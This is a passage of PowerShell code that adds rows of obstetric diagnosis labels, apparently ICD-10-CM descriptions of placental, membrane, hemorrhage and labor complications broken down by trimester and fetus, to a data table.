fetus 5") + $null = $DiagnosisList.Rows.Add("Disorder of amniotic fluid and membranes, unspecified, first trimester","Disorder of amniotic fluid and membranes, unspecified, first trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Disorder of amniotic fluid and membranes, unspecified, second trimester","Disorder of amniotic fluid and membranes, unspecified, second trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Disorder of amniotic fluid and membranes, unspecified, second trimester","Disorder of amniotic fluid and membranes, unspecified, second trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Disorder of amniotic fluid and membranes, unspecified, second trimester","Disorder of amniotic fluid and membranes, unspecified, second trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Disorder of amniotic fluid and membranes, unspecified, second trimester","Disorder of amniotic fluid and membranes, unspecified, second trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Disorder of amniotic fluid and membranes, unspecified, second trimester","Disorder of amniotic fluid and membranes, unspecified, second trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Disorder of amniotic fluid and membranes, unspecified, second trimester","Disorder of amniotic fluid and membranes, unspecified, second trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Disorder of amniotic fluid and membranes, unspecified, second trimester","Disorder of amniotic fluid and membranes, unspecified, second trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Disorder of amniotic fluid and membranes, unspecified, third trimester","Disorder of amniotic fluid and membranes, unspecified, third trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Disorder of amniotic fluid and membranes, unspecified, third trimester","Disorder of amniotic fluid and membranes, unspecified, third trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Disorder of amniotic fluid and membranes, unspecified, third trimester","Disorder of amniotic fluid and membranes, unspecified, third trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Disorder of amniotic fluid and membranes, unspecified, third trimester","Disorder of amniotic fluid and membranes, unspecified, third trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Disorder of amniotic fluid and membranes, unspecified, third trimester","Disorder of amniotic fluid and membranes, unspecified, third trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Disorder of amniotic fluid and membranes, unspecified, third trimester","Disorder of amniotic fluid and membranes, unspecified, third trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Disorder of amniotic fluid and membranes, unspecified, third trimester","Disorder of amniotic fluid and membranes, unspecified, third trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Premature rupture of membranes, onset of labor within 24 hours of rupture","Premature rupture of membranes, onset of labor within 24 hours of rupture, unspecified weeks of gestation") + $null = $DiagnosisList.Rows.Add("Preterm premature rupture of membranes, onset of labor within 24 hours of rupture","Preterm premature rupture of membranes, onset of labor within 24 hours of rupture, first trimester") + $null = $DiagnosisList.Rows.Add("Preterm premature rupture of membranes, onset of labor within 24 hours of rupture","Preterm premature rupture of membranes, onset of labor within 24 hours of rupture, second trimester") + $null = $DiagnosisList.Rows.Add("Preterm premature rupture of membranes, onset of labor within 24 hours of rupture","Preterm premature rupture of membranes, onset of labor within 24 hours of rupture, third trimester") + $null = $DiagnosisList.Rows.Add("Preterm premature rupture of membranes, onset of labor within 24 hours of rupture","Preterm premature rupture of membranes, onset of labor within 24 hours of rupture, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Full-term premature rupture of membranes, onset of labor within 24 hours of rupture","Full-term premature rupture of membranes, onset of labor within 24 hours of rupture") + $null = $DiagnosisList.Rows.Add("Premature rupture of membranes, onset of labor more than 24 hours following rupture","Premature rupture of membranes, onset of labor more than 24 hours following rupture, unspecified weeks of gestation") + $null = $DiagnosisList.Rows.Add("Preterm premature rupture of membranes, onset of labor more than 24 hours following rupture","Preterm premature rupture of membranes, onset of labor more than 24 hours following rupture, first trimester") + $null = $DiagnosisList.Rows.Add("Preterm premature rupture of membranes, onset of labor more than 24 hours following rupture","Preterm premature rupture of membranes, onset of labor more than 24 hours following rupture, second trimester") + $null = $DiagnosisList.Rows.Add("Preterm premature rupture of membranes, onset of labor more than 24 hours following rupture","Preterm premature rupture of membranes, onset of labor more than 24 hours following rupture, third trimester") + $null = $DiagnosisList.Rows.Add("Preterm premature rupture of membranes, onset of labor more than 24 hours following rupture","Preterm premature rupture of membranes, onset of labor more than 24 hours following rupture, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Full-term premature rupture of membranes, onset of labor more than 24 hours following rupture","Full-term premature rupture of membranes, onset of labor more than 24 hours following rupture") + $null = $DiagnosisList.Rows.Add("Premature rupture of membranes, unspecified as to length of time between rupture and onset of labor","Premature rupture of membranes, unspecified as to length of time between rupture and onset of labor, unspecified weeks of gestation") + $null = $DiagnosisList.Rows.Add("Preterm premature rupture of membranes, unspecified as to length of time between rupture and onset of labor","Preterm premature rupture of membranes, unspecified as to length of time between rupture and onset of labor, first trimester") + $null = $DiagnosisList.Rows.Add("Preterm premature rupture of membranes, unspecified as to length of time between rupture and onset of labor","Preterm premature rupture of membranes, unspecified as to length of time between rupture and onset of labor, second trimester") + $null = $DiagnosisList.Rows.Add("Preterm premature rupture of membranes, unspecified as to length of time between rupture and onset of labor","Preterm premature rupture of membranes, unspecified as to length of time between rupture and onset of labor, third trimester") + $null = $DiagnosisList.Rows.Add("Preterm premature rupture of membranes, unspecified as to length of time between rupture and onset of labor","Preterm premature rupture of membranes, unspecified as to length of time between rupture and onset of labor, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Full-term premature rupture of membranes, unspecified as to length of time between rupture and onset of labor","Full-term premature rupture of membranes, unspecified as to length of time between rupture and onset of labor") + $null = $DiagnosisList.Rows.Add("Fetomaternal placental transfusion syndrome","Fetomaternal placental transfusion syndrome, first trimester") + $null = $DiagnosisList.Rows.Add("Fetomaternal placental transfusion syndrome","Fetomaternal placental transfusion syndrome, second trimester") + $null = $DiagnosisList.Rows.Add("Fetomaternal placental transfusion syndrome","Fetomaternal placental transfusion syndrome, third trimester") + $null = $DiagnosisList.Rows.Add("Fetomaternal placental transfusion syndrome","Fetomaternal placental transfusion syndrome, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Fetus-to-fetus placental transfusion syndrome","Fetus-to-fetus placental transfusion syndrome, first trimester") + $null = $DiagnosisList.Rows.Add("Fetus-to-fetus placental transfusion syndrome","Fetus-to-fetus placental transfusion syndrome, second trimester") + $null = $DiagnosisList.Rows.Add("Fetus-to-fetus placental transfusion syndrome","Fetus-to-fetus placental transfusion syndrome, third trimester") + $null = $DiagnosisList.Rows.Add("Fetus-to-fetus placental transfusion syndrome","Fetus-to-fetus placental transfusion syndrome, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Malformation of placenta, unspecified","Malformation of placenta, unspecified, first trimester") + $null = $DiagnosisList.Rows.Add("Malformation of placenta, unspecified","Malformation of placenta, unspecified, second trimester") + $null = $DiagnosisList.Rows.Add("Malformation of placenta, unspecified","Malformation of placenta, unspecified, third trimester") + $null = $DiagnosisList.Rows.Add("Malformation of placenta, unspecified","Malformation of placenta, unspecified, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Circumvallate placenta","Circumvallate placenta, first trimester") + $null = $DiagnosisList.Rows.Add("Circumvallate placenta","Circumvallate placenta, second trimester") + $null = $DiagnosisList.Rows.Add("Circumvallate placenta","Circumvallate placenta, third trimester") + $null = $DiagnosisList.Rows.Add("Circumvallate placenta","Circumvallate placenta, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Velamentous insertion of umbilical cord","Velamentous insertion of umbilical cord, first trimester") + $null = $DiagnosisList.Rows.Add("Velamentous insertion of umbilical cord","Velamentous insertion of umbilical cord, second trimester") + $null = $DiagnosisList.Rows.Add("Velamentous insertion of umbilical cord","Velamentous insertion of umbilical cord, third trimester") + $null = $DiagnosisList.Rows.Add("Velamentous insertion of umbilical cord","Velamentous insertion of umbilical cord, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Other malformation of placenta","Other malformation of placenta, first trimester") + $null = $DiagnosisList.Rows.Add("Other malformation of placenta","Other malformation of placenta, second trimester") + $null = $DiagnosisList.Rows.Add("Other malformation of placenta","Other malformation of placenta, third trimester") + $null = $DiagnosisList.Rows.Add("Other malformation of placenta","Other malformation of placenta, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Placenta accreta","Placenta accreta, first trimester") + $null = $DiagnosisList.Rows.Add("Placenta accreta","Placenta accreta, second trimester") + $null = $DiagnosisList.Rows.Add("Placenta accreta","Placenta accreta, third trimester") + $null = $DiagnosisList.Rows.Add("Placenta accreta","Placenta accreta, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Placenta increta","Placenta increta, first trimester") + $null = $DiagnosisList.Rows.Add("Placenta increta","Placenta increta, second trimester") + $null = $DiagnosisList.Rows.Add("Placenta increta","Placenta increta, third trimester") + $null = $DiagnosisList.Rows.Add("Placenta increta","Placenta increta, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Placenta percreta","Placenta percreta, first trimester") + $null = $DiagnosisList.Rows.Add("Placenta percreta","Placenta percreta, second trimester") + $null = $DiagnosisList.Rows.Add("Placenta percreta","Placenta percreta, third trimester") + $null = $DiagnosisList.Rows.Add("Placenta percreta","Placenta percreta, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Placental infarction","Placental infarction, first trimester") + $null = $DiagnosisList.Rows.Add("Placental infarction","Placental infarction, second trimester") + $null = $DiagnosisList.Rows.Add("Placental infarction","Placental infarction, third trimester") + $null = $DiagnosisList.Rows.Add("Placental infarction","Placental infarction, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Other placental disorders","Other placental disorders, first trimester") + $null = $DiagnosisList.Rows.Add("Other placental disorders","Other placental disorders, second trimester") + $null = $DiagnosisList.Rows.Add("Other placental disorders","Other placental disorders, third trimester") + $null = $DiagnosisList.Rows.Add("Other placental disorders","Other placental disorders, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Unspecified placental disorder","Unspecified placental disorder, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Unspecified placental disorder","Unspecified placental disorder, first trimester") + $null = $DiagnosisList.Rows.Add("Unspecified placental disorder","Unspecified placental disorder, second trimester") + $null = $DiagnosisList.Rows.Add("Unspecified placental disorder","Unspecified placental disorder, third trimester") + $null = $DiagnosisList.Rows.Add("Complete placenta previa NOS or without hemorrhage","Complete placenta previa NOS or without hemorrhage, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Complete placenta previa NOS or without hemorrhage","Complete placenta previa NOS or without hemorrhage, first trimester") + $null = $DiagnosisList.Rows.Add("Complete placenta previa NOS or without hemorrhage","Complete placenta previa NOS or without hemorrhage, second trimester") + $null = $DiagnosisList.Rows.Add("Complete placenta previa NOS or without hemorrhage","Complete placenta previa NOS or without hemorrhage, third trimester") + $null = $DiagnosisList.Rows.Add("Complete placenta previa with hemorrhage","Complete placenta previa with hemorrhage, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Complete placenta previa with hemorrhage","Complete placenta previa with hemorrhage, first trimester") + $null = $DiagnosisList.Rows.Add("Complete placenta previa with hemorrhage","Complete placenta previa with hemorrhage, second trimester") + $null = $DiagnosisList.Rows.Add("Complete placenta previa with hemorrhage","Complete placenta previa with hemorrhage, third trimester") + $null = $DiagnosisList.Rows.Add("Partial placenta previa without hemorrhage","Partial placenta previa NOS or without hemorrhage, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Partial placenta previa without hemorrhage","Partial placenta previa NOS or without hemorrhage, first trimester") + $null = $DiagnosisList.Rows.Add("Partial placenta previa without hemorrhage","Partial placenta previa NOS or without hemorrhage, second trimester") + $null = $DiagnosisList.Rows.Add("Partial placenta previa without hemorrhage","Partial placenta previa NOS or without hemorrhage, third trimester") + $null = $DiagnosisList.Rows.Add("Partial placenta previa with hemorrhage","Partial placenta previa with hemorrhage, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Partial placenta previa with hemorrhage","Partial placenta previa with hemorrhage, first trimester") + $null = $DiagnosisList.Rows.Add("Partial placenta previa with hemorrhage","Partial placenta previa with hemorrhage, second trimester") + $null = $DiagnosisList.Rows.Add("Partial placenta previa with hemorrhage","Partial placenta previa with hemorrhage, third trimester") + $null = $DiagnosisList.Rows.Add("Low lying placenta NOS or without hemorrhage","Low lying placenta NOS or without hemorrhage, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Low lying placenta NOS or without hemorrhage","Low lying placenta NOS or without hemorrhage, first trimester") + $null = $DiagnosisList.Rows.Add("Low lying placenta NOS or without hemorrhage","Low lying placenta NOS or without hemorrhage, second trimester") + $null = $DiagnosisList.Rows.Add("Low lying placenta NOS or without hemorrhage","Low lying placenta NOS or without hemorrhage, third trimester") + $null = $DiagnosisList.Rows.Add("Low lying placenta with hemorrhage","Low lying placenta with hemorrhage, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Low lying placenta with hemorrhage","Low lying placenta with hemorrhage, first trimester") + $null = $DiagnosisList.Rows.Add("Low lying placenta with hemorrhage","Low lying placenta with hemorrhage, second trimester") + $null = $DiagnosisList.Rows.Add("Low lying placenta with hemorrhage","Low lying placenta with hemorrhage, third trimester") + $null = $DiagnosisList.Rows.Add("Premature separation of placenta with coagulation defect, unspecified","Premature separation of placenta with coagulation defect, unspecified, first trimester") + $null = $DiagnosisList.Rows.Add("Premature separation of placenta with coagulation defect, unspecified","Premature separation of placenta with coagulation defect, unspecified, second trimester") + $null = $DiagnosisList.Rows.Add("Premature separation of placenta with coagulation defect, unspecified","Premature separation of placenta with coagulation defect, unspecified, third trimester") + $null = $DiagnosisList.Rows.Add("Premature separation of placenta with coagulation defect, unspecified","Premature separation of placenta with coagulation defect, unspecified, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Premature separation of placenta with afibrinogenemia","Premature separation of placenta with afibrinogenemia, first trimester") + $null = $DiagnosisList.Rows.Add("Premature separation of placenta with afibrinogenemia","Premature separation of placenta with afibrinogenemia, second trimester") + $null = $DiagnosisList.Rows.Add("Premature separation of placenta with afibrinogenemia","Premature separation of placenta with afibrinogenemia, third trimester") + $null = $DiagnosisList.Rows.Add("Premature separation of placenta with afibrinogenemia","Premature separation of placenta with afibrinogenemia, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Premature separation of placenta with disseminated intravascular coagulation","Premature separation of placenta with disseminated intravascular coagulation, first trimester") + $null = $DiagnosisList.Rows.Add("Premature separation of placenta with disseminated intravascular coagulation","Premature separation of placenta with disseminated intravascular coagulation, second trimester") + $null = $DiagnosisList.Rows.Add("Premature separation of placenta with disseminated intravascular coagulation","Premature separation of placenta with disseminated intravascular coagulation, third trimester") + $null = $DiagnosisList.Rows.Add("Premature separation of placenta with disseminated intravascular coagulation","Premature separation of placenta with disseminated intravascular coagulation, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Premature separation of placenta with other coagulation defect","Premature separation of placenta with other coagulation defect, first trimester") + $null = $DiagnosisList.Rows.Add("Premature separation of placenta with other coagulation defect","Premature separation of placenta with other coagulation defect, second trimester") + $null = $DiagnosisList.Rows.Add("Premature separation of placenta with other coagulation defect","Premature separation of placenta with other coagulation defect, third trimester") + $null = $DiagnosisList.Rows.Add("Premature separation of placenta with other coagulation defect","Premature separation of placenta with other coagulation defect, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Other premature separation of placenta","Other premature separation of placenta, first trimester") + $null = $DiagnosisList.Rows.Add("Other premature separation of placenta","Other premature separation of placenta, second trimester") + $null = $DiagnosisList.Rows.Add("Other premature separation of placenta","Other premature separation of placenta, third trimester") + $null = $DiagnosisList.Rows.Add("Other premature separation of placenta","Other premature separation of placenta, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Premature separation of placenta, unspecified","Premature separation of placenta, unspecified, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Premature separation of placenta, unspecified","Premature separation of placenta, unspecified, first trimester") + $null = $DiagnosisList.Rows.Add("Premature separation of placenta, unspecified","Premature separation of placenta, unspecified, second trimester") + $null = $DiagnosisList.Rows.Add("Premature separation of placenta, unspecified","Premature separation of placenta, unspecified, third trimester") + $null = $DiagnosisList.Rows.Add("Antepartum hemorrhage with coagulation defect, unspecified","Antepartum hemorrhage with coagulation defect, unspecified, first trimester") + $null = $DiagnosisList.Rows.Add("Antepartum hemorrhage with coagulation defect, unspecified","Antepartum hemorrhage with coagulation defect, unspecified, second trimester") + $null = $DiagnosisList.Rows.Add("Antepartum hemorrhage with coagulation defect, unspecified","Antepartum hemorrhage with coagulation defect, unspecified, third trimester") + $null = $DiagnosisList.Rows.Add("Antepartum hemorrhage with coagulation defect, unspecified","Antepartum hemorrhage with coagulation defect, unspecified, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Antepartum hemorrhage with afibrinogenemia","Antepartum hemorrhage with afibrinogenemia, first trimester") + $null = $DiagnosisList.Rows.Add("Antepartum hemorrhage with afibrinogenemia","Antepartum hemorrhage with afibrinogenemia, second trimester") + $null = $DiagnosisList.Rows.Add("Antepartum hemorrhage with afibrinogenemia","Antepartum hemorrhage with afibrinogenemia, third trimester") + $null = $DiagnosisList.Rows.Add("Antepartum hemorrhage with afibrinogenemia","Antepartum hemorrhage with afibrinogenemia, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Antepartum hemorrhage with disseminated intravascular coagulation","Antepartum hemorrhage with disseminated intravascular coagulation, first trimester") + $null = $DiagnosisList.Rows.Add("Antepartum hemorrhage with disseminated intravascular coagulation","Antepartum hemorrhage with disseminated intravascular coagulation, second trimester") + $null = $DiagnosisList.Rows.Add("Antepartum hemorrhage with disseminated intravascular coagulation","Antepartum hemorrhage with disseminated intravascular coagulation, third trimester") + $null = $DiagnosisList.Rows.Add("Antepartum hemorrhage with disseminated intravascular coagulation","Antepartum hemorrhage with disseminated intravascular coagulation, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Antepartum hemorrhage with other coagulation defect","Antepartum hemorrhage with other coagulation defect, first trimester") + $null = $DiagnosisList.Rows.Add("Antepartum hemorrhage with other coagulation defect","Antepartum hemorrhage with other coagulation defect, second trimester") + $null = $DiagnosisList.Rows.Add("Antepartum hemorrhage with other coagulation defect","Antepartum hemorrhage with other coagulation defect, third trimester") + $null = $DiagnosisList.Rows.Add("Antepartum hemorrhage with other coagulation defect","Antepartum hemorrhage with other coagulation defect, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Other antepartum hemorrhage","Other antepartum hemorrhage, first trimester") + $null = $DiagnosisList.Rows.Add("Other antepartum hemorrhage","Other antepartum hemorrhage, second trimester") + $null = $DiagnosisList.Rows.Add("Other antepartum hemorrhage","Other antepartum hemorrhage, third trimester") + $null = $DiagnosisList.Rows.Add("Other antepartum hemorrhage","Other antepartum hemorrhage, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Antepartum hemorrhage, unspecified","Antepartum hemorrhage, unspecified, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Antepartum hemorrhage, unspecified","Antepartum hemorrhage, unspecified, first trimester") + $null = $DiagnosisList.Rows.Add("Antepartum hemorrhage, unspecified","Antepartum hemorrhage, unspecified, second trimester") + $null = $DiagnosisList.Rows.Add("Antepartum hemorrhage, unspecified","Antepartum hemorrhage, unspecified, third trimester") + $null = $DiagnosisList.Rows.Add("False labor before 37 completed weeks of gestation","False labor before 37 completed weeks of gestation, unspecified trimester") + $null = $DiagnosisList.Rows.Add("False labor before 37 completed weeks of gestation","False labor before 37 completed weeks of gestation, second trimester") + $null = $DiagnosisList.Rows.Add("False labor before 37 completed weeks of gestation","False labor before 37 completed weeks of gestation, third trimester") + $null = $DiagnosisList.Rows.Add("False labor at or after 37 completed weeks of gestation","False labor at or after 37 completed weeks of gestation") + $null = $DiagnosisList.Rows.Add("False labor, unspecified","False labor, unspecified") + $null = $DiagnosisList.Rows.Add("Late pregnancy","Post-term pregnancy") + $null = $DiagnosisList.Rows.Add("Late pregnancy","Prolonged pregnancy") + $null = $DiagnosisList.Rows.Add("Preterm labor without delivery","Preterm labor without delivery, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Preterm labor without delivery","Preterm labor without delivery, second trimester") + $null = $DiagnosisList.Rows.Add("Preterm labor without delivery","Preterm labor without delivery, third trimester") + $null = $DiagnosisList.Rows.Add("Preterm labor with preterm delivery, unspecified trimester","Preterm labor with preterm delivery, unspecified trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Preterm labor with preterm delivery, unspecified trimester","Preterm labor with preterm delivery, unspecified trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Preterm labor with preterm delivery, unspecified trimester","Preterm labor with preterm delivery, unspecified trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Preterm labor with preterm delivery, unspecified trimester","Preterm labor with preterm delivery, unspecified trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Preterm labor with preterm delivery, unspecified trimester","Preterm labor with preterm delivery, unspecified trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Preterm labor with preterm delivery, unspecified trimester","Preterm labor with preterm delivery, unspecified trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Preterm labor with preterm delivery, unspecified trimester","Preterm labor with preterm delivery, unspecified trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Preterm labor second trimester with preterm delivery second trimester","Preterm labor second trimester with preterm delivery second trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Preterm labor second trimester with preterm delivery second trimester","Preterm labor second trimester with preterm delivery second trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Preterm labor second trimester with preterm delivery second trimester","Preterm labor second trimester with preterm delivery second trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Preterm labor second trimester with preterm delivery second trimester","Preterm labor second trimester with preterm delivery second trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Preterm labor second trimester with preterm delivery second trimester","Preterm labor second trimester with preterm delivery second trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Preterm labor second trimester with preterm delivery second trimester","Preterm labor second trimester with preterm delivery second trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Preterm labor second trimester with preterm delivery second trimester","Preterm labor second trimester with preterm delivery second trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Preterm labor second trimester with preterm delivery third trimester","Preterm labor second trimester with preterm delivery third trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Preterm labor second trimester with preterm delivery third trimester","Preterm labor second trimester with preterm delivery third trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Preterm labor second trimester with preterm delivery third trimester","Preterm labor second trimester with preterm delivery third trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Preterm labor second trimester with preterm delivery third trimester","Preterm labor second trimester with preterm delivery third trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Preterm labor second trimester with preterm delivery third trimester","Preterm labor second trimester with preterm delivery third trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Preterm labor second trimester with preterm delivery third trimester","Preterm labor second trimester with preterm delivery third trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Preterm labor second trimester with preterm delivery third trimester","Preterm labor second trimester with preterm delivery third trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Preterm labor third trimester with preterm delivery third trimester","Preterm labor third trimester with preterm delivery third trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Preterm labor third trimester with preterm delivery third trimester","Preterm labor third trimester with preterm delivery third trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Preterm labor third trimester with preterm delivery third trimester","Preterm labor third trimester with preterm delivery third trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Preterm labor third trimester with preterm delivery third trimester","Preterm labor third trimester with preterm delivery third trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Preterm labor third trimester with preterm delivery third trimester","Preterm labor third trimester with preterm delivery third trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Preterm labor third trimester with preterm delivery third trimester","Preterm labor third trimester with preterm delivery third trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Preterm labor third trimester with preterm delivery third trimester","Preterm labor third trimester with preterm delivery third trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Term delivery with preterm labor, unspecified trimester","Term delivery with preterm labor, unspecified trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Term delivery with preterm labor, unspecified trimester","Term delivery with preterm labor, unspecified trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Term delivery with preterm labor, unspecified trimester","Term delivery with preterm labor, unspecified trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Term delivery with preterm labor, unspecified trimester","Term delivery with preterm labor, unspecified trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Term delivery with preterm labor, unspecified trimester","Term delivery with preterm labor, unspecified trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Term delivery with preterm labor, unspecified trimester","Term delivery with preterm labor, unspecified trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Term delivery with preterm labor, unspecified trimester","Term delivery with preterm labor, unspecified trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Term delivery with preterm labor, second trimester","Term delivery with preterm labor, second trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Term delivery with preterm labor, second trimester","Term delivery with preterm labor, second trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Term delivery with preterm labor, second trimester","Term delivery with preterm labor, second trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Term delivery with preterm labor, second trimester","Term delivery with preterm labor, second trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Term delivery with preterm labor, second trimester","Term delivery with preterm labor, second trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Term delivery with preterm labor, second trimester","Term delivery with preterm labor, second trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Term delivery with preterm labor, second trimester","Term delivery with preterm labor, second trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Term delivery with preterm labor, third trimester","Term delivery with preterm labor, third trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Term delivery with preterm labor, third trimester","Term delivery with preterm labor, third trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Term delivery with preterm labor, third trimester","Term delivery with preterm labor, third trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Term delivery with preterm labor, third trimester","Term delivery with preterm labor, third trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Term delivery with preterm labor, third trimester","Term delivery with preterm labor, third trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Term delivery with preterm labor, third trimester","Term delivery with preterm labor, third trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Term delivery with preterm labor, third trimester","Term delivery with preterm labor, third trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Failed induction of labor","Failed medical induction of labor") + $null = $DiagnosisList.Rows.Add("Failed induction of labor","Failed instrumental induction of labor") + $null = $DiagnosisList.Rows.Add("Failed induction of labor","Other failed induction of labor") + $null = $DiagnosisList.Rows.Add("Failed induction of labor","Failed induction of labor, unspecified") + $null = $DiagnosisList.Rows.Add("Abnormalities of forces of labor","Primary inadequate contractions") + $null = $DiagnosisList.Rows.Add("Abnormalities of forces of labor","Secondary uterine inertia") + $null = $DiagnosisList.Rows.Add("Abnormalities of forces of labor","Other uterine inertia") + $null = $DiagnosisList.Rows.Add("Abnormalities of forces of labor","Precipitate labor") + $null = $DiagnosisList.Rows.Add("Abnormalities of forces of labor","Hypertonic, incoordinate, and prolonged uterine contractions") + $null = $DiagnosisList.Rows.Add("Abnormalities of forces of labor","Other abnormalities of forces of labor") + $null = $DiagnosisList.Rows.Add("Abnormalities of forces of labor","Abnormality of forces of labor, unspecified") + $null = $DiagnosisList.Rows.Add("Long labor","Prolonged first stage (of labor)") + $null = $DiagnosisList.Rows.Add("Long labor","Prolonged second stage (of labor)") + $null = $DiagnosisList.Rows.Add("Long labor","Delayed delivery of second twin, triplet, etc.") + $null = $DiagnosisList.Rows.Add("Long labor","Long labor, unspecified") + $null = $DiagnosisList.Rows.Add("Obstructed labor due to incomplete rotation of fetal head","Obstructed labor due to incomplete rotation of fetal head, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Obstructed labor due to incomplete rotation of fetal head","Obstructed labor due to incomplete rotation of fetal head, fetus 1") + $null = $DiagnosisList.Rows.Add("Obstructed labor due to incomplete rotation of fetal head","Obstructed labor due to incomplete rotation of fetal head, fetus 2") + $null = $DiagnosisList.Rows.Add("Obstructed labor due to incomplete rotation of fetal head","Obstructed labor due to incomplete rotation of fetal head, fetus 3") + $null = $DiagnosisList.Rows.Add("Obstructed labor due to incomplete rotation of fetal head","Obstructed labor due to incomplete rotation of fetal head, fetus 4") + $null = $DiagnosisList.Rows.Add("Obstructed labor due to incomplete rotation of fetal head","Obstructed labor due to incomplete rotation of fetal head, fetus 5") + $null = $DiagnosisList.Rows.Add("Obstructed labor due to incomplete rotation of fetal head","Obstructed labor due to incomplete rotation of fetal head, other fetus") + $null = $DiagnosisList.Rows.Add("Obstructed labor due to breech presentation","Obstructed labor due to breech presentation, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Obstructed labor due to breech presentation","Obstructed labor due to breech presentation, fetus 1") + $null = $DiagnosisList.Rows.Add("Obstructed labor due to breech presentation","Obstructed labor due to breech presentation, fetus 2") + $null = $DiagnosisList.Rows.Add("Obstructed labor due to breech presentation","Obstructed labor due to breech presentation, fetus 3") + $null = $DiagnosisList.Rows.Add("Obstructed labor due to breech presentation","Obstructed labor due to breech presentation, fetus 4") + $null = $DiagnosisList.Rows.Add("Obstructed labor due to breech presentation","Obstructed labor due to breech presentation, fetus 5") + $null = $DiagnosisList.Rows.Add("Obstructed labor due to breech presentation","Obstructed labor due to breech presentation, other fetus") + $null = $DiagnosisList.Rows.Add("Obstructed labor due to face 